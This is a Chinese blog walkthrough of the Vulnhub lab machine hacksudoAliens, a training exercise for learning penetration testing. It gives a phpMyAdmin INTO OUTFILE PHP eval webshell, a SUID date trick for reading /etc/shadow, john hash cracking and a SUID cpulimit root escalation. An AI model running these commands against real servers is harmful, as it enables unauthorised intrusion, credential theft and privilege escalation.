Vulnhub靶机测试 No.31 hacksudoAliens

最新推荐文章于 2023-12-01 14:24:42 发布
最新推荐文章于 2023-12-01 14:24:42 发布
阅读量581 收藏 2
点赞数
分类专栏: 靶机学习 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/124115353
版权

hacksudoAliens

hacksudoAliens

1 靶机介绍

https://www.vulnhub.com/ 下载
Virtualbox 仅主机网卡 启动

2 测试过程

2.1 nmap探测ip

nmap -sP 192.168.56.0/24

在这里插入图片描述
已知
192.168.56.1 为网关
192.168.56.100 为DHCP服务器
192.168.56.137 为kali ip
所以确定靶机为192.168.56.101

2.2 nmap扫描端口

nmap -sC -sV -A -p- 192.168.56.101 -o port.txt

root@kali:~/baji/vulnhub/hacksudoAliens# nmap -sC -sV -A -p- 192.168.56.101 -o port.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-12 09:21 CST
Nmap scan report for 192.168.56.101
Host is up (0.00028s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 31:d8:56:f4:cf:8b:09:e8:a1:5e:2e:dd:ac:08:6b:dd (RSA)
|   256 cd:65:ec:9e:d0:2c:6b:4e:02:40:c3:fd:01:5d:d1:87 (ECDSA)
|_  256 03:00:28:0e:0b:da:12:68:c3:c5:45:ab:bb:92:92:fa (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo Alien?
9000/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: phpMyAdmin
MAC Address: 08:00:27:17:0A:ED (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.56.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.39 seconds

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
9000/tcp open http Apache httpd 2.4.38 ((Debian))

从扫描结果 可以看到9000端口为phpmyadmin 很熟悉

2.3 测试思路

  • 80端口 目录枚举,各功能点漏洞探测。源码审查。
  • 9000端口 phpmyadmin,爆破,版本漏洞
  • 22端口 爆破。

2.4 80端口探测

只有一堆js文件

2.5 gobuster目录枚举

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.56.101/ -x ".html,.txt,.php,.js"

在这里插入图片描述
/index.html (Status: 200) [Size: 2225]
/images (Status: 301) [Size: 317] [–> http://192.168.56.101/images/]
/game.js (Status: 200) [Size: 8394]
/game.html (Status: 200) [Size: 701]
/engine.js (Status: 200) [Size: 11947]
/backup (Status: 301) [Size: 317] [–> http://192.168.56.101/backup/]
/data.js (Status: 200) [Size: 5847153]
/alien.js (Status: 200) [Size: 947]
/server-status (Status: 403) [Size: 279]

2.6 翻目录

backup 有一个数据库备份文件
在这里插入图片描述

2.7 查看mysql.bak

在这里插入图片描述
发现mysql登录的账号密码 vishal hacksudo

这样子的话 9000端口 phpmyadmin就有了。

2.8 9000端口phpmyadmin登录

登录成功
看有没有写入权限,有的话直接写入马getshell
show global variables like ‘%secure_file_priv%’
在这里插入图片描述
为空 可以写入任意文件。
写入马 蚁剑连接即可。

select '<?php @eval($_POST[a]);?>'INTO OUTFILE '/var/www/html/shell.php'

2.9 蚁剑连接

在这里插入图片描述

2.10 反弹shell

在这里插入图片描述

2.11 切换完整终端

  1. python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
  2. export TERM=xterm 然后 Ctrl+Z 退出来一下
  3. stty raw -echo;fg 回车后输入 reset 再回车
  4. stty rows 46 columns 188

之后就可以进行后渗透提权了

3 提权

3.1 信息收集

3.1.1 用户信息收集
www-data@hacksudo:/var/www/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:112:121::/var/lib/saned:/usr/sbin/nologin
colord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:117:65534::/run/sshd:/usr/sbin/nologin
mysql:x:118:126:MySQL Server,,,:/nonexistent:/bin/false

在这里插入图片描述

3.1.2 suid信息收集
find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述

可以使用date读取任意文件

3.2 suid权限的date读取shadow

LFILE=/etc/shadow
date -f $LFILE

在这里插入图片描述

3.3 john 破解ssh密码

hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::

复制到 ssh.txt

  1. john ssh.txt
  2. john ssh.txt --show
    在这里插入图片描述

可以看到 密码为aliens

3.4 su hacksudo

在这里插入图片描述

3.5 信息收集

发现有root suid权限的文件
在这里插入图片描述

3.6 cpulimit提权

​ ./cpulimit -l 100 -f – /bin/sh -p
在这里插入图片描述

3.7 读取flag

在这里插入图片描述

4 总结

本次靶机比较简单

  1. 通过端口扫描发现80,9000(phpmyadmin目录),22端口。
  2. 通过80端口目录枚举发现数据库备份文件,登录phpmyadmin。
  3. phpmyadmin后台写文件getshell。
  4. suid date 读取shadow。
  5. john解密shadow。
  6. suid cpulimit 提权。
LuckyCharm~
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub之HACKSUDO: ALIEN
qwweggfe的博客
08-12 311
信息收集 首先进行ip扫描 查看开启哪些端口 打开网页进行查看 对其网页目录进行扫描 gobuster dir -u http://192.168.181.149/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 打开/image的目录,发现一张图片,我怀疑可能是隐写,于是进行爆破 stegbrute -f /root/sprites.png -w /usr/share/wordlists..
HacksudoAliens
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-04 416
HacksudoAliens arp-scan --interface=eth0 192.168.1.0/24 nmap -sC -sV -p- -sT 192.168.1.251 -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans sV: Probe open ports to determine service/version info -sC: equivalent to --script=default ..
看完这篇教你玩转靶机HACKSUDO: ALIENS
清唪的博客
04-07 566
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。 靶机下载: https://download.vulnhub.com/hacksudo/HacksudoAliens.zip 1.nmap -sS -A -p- -n +靶机ip 2.发现有9000端口访.
Vulnhub】靶场之Hacksudo:Aliens
最新发布
2301_76232299的博客
12-01 5242
信息收集是很重要,思路一步一步的走,就会很轻松了,这个靶机还是蛮有趣了,也不难😁😁😁,有兴趣的可以去玩玩!
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
Aluxian_的博客
10-26 782
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
靶机练习 aliens phpmyadmin拿shell date命令提权
hljzzj的博客
01-25 3607
靶机信息 下载地址: https://www.vulnhub.com/entry/hacksudo-aliens,676/ 名称: hacksudo系列ALIENS 靶场: VulnHub.com 难度: 简单 发布时间: 2021年4月4日 提示信息: 无 目标: user.txt和root.txt 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -.
正向代理与方向代理--zl
红梅花儿开
07-22 1051
一、正向代理    正向代理是一个位于客户端和原始服务器(origin server)之间的服务器,为了从原始服务器取得内容,客户端向代理发送一个请求并指定目标(原始服务器),然后代理向原始服务器转交请求并将获得的内容返回给客户端。客户端必须要进行一些特别的设置才能使用正向代理。    正向代理的典型用途是为在防火墙内的局域网客户端提供访问Internet的途径。正向代理还可以使用缓冲特性(由
简单的Apache Airflow(CVE-2022-40127)漏洞复现
kali_Ma的博客
12-09 1498
Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。官方已发布版本 2.4.3,可升级Apache Airflow版本到2.4.0或以上,或者停用默认 Dags。当攻击者可访问到Apache Airflow的后台,且环境中存在默认。
带你玩转渗透测试靶场Vulnhub——Gaara:1
m0_74025111的博客
10-22 605
跑出了这个Cryoserver,老规矩访问一下喽,页面访问打开的瞬间是空白,后来琢磨了一下,发现页面是可以滑动的,直接滑到最下面是有三个后缀名的,直接联想到有可以访问了哈哈哈,一个一个的去访问,访问发现第一个和第二个后缀访问出来的是一堆英文翻译过来也是一些没啥有用的信息。根据这个解码的提示,/usr/local/games目录下是有提示的的,直接切换至其目录下查看,切换到目录下发现了一文件,打开之后发现这是一个典型的brainfuck加密,解密之后没啥信息。扫出来是,一共是开放了两个端口的。
入侵靶机DC-9
干铮的博客
11-11 500
1.主机发现 Nmap -sP 192.168.43.0/24 C:\Users\ASUS>Nmap -sP 192.168.43.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-11 11:53 ?D1ú±ê×?ê±?? Nmap scan report for 192.168.43.79 Host is up (0.0010s latency). MAC Address: 00:0C:29:B7:B6:AD (VMware).
靶机渗透练习20-My School
hirak0的博客
04-16 984
靶机描述 靶机地址:https://www.vulnhub.com/entry/my-school-1,604/ Description Welcome to “My School” This VM has been designed by Sachin Verma. This boot to root VM is fully a real life based scenario. It has been designed in way to enhance user’s skills while te
Apache 服务器存在高危提权漏洞,请升级至最新版本 2.4.39
cpongo5
04-05 2353
开发四年只会写业务代码,分布式高并发都不会还做程序员? >>> Apache HTTP 服务器于4月...
Linux总结(二十五):linux的/文件特殊权限SUID、SGID、SBIT
科大小笨的博客
07-14 860
一、SetUID文件特殊权限 1、基本定义 可以看到,原本表示文件所有者权限中的 x 权限位,却出现了 s 权限,此种权限通常称为SetUID,简称SUID 特殊权限。 SUID 特殊权限仅适用于可执行文件,所具有的功能是,只要用户对设有 SUID 的文件有执行权限,那么当用户执行此文件时,会以文件所有者的身份去执行此文件,一旦文件执行结束,身份的切换也随之...
vulnhub靶机系列:
09-09
4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值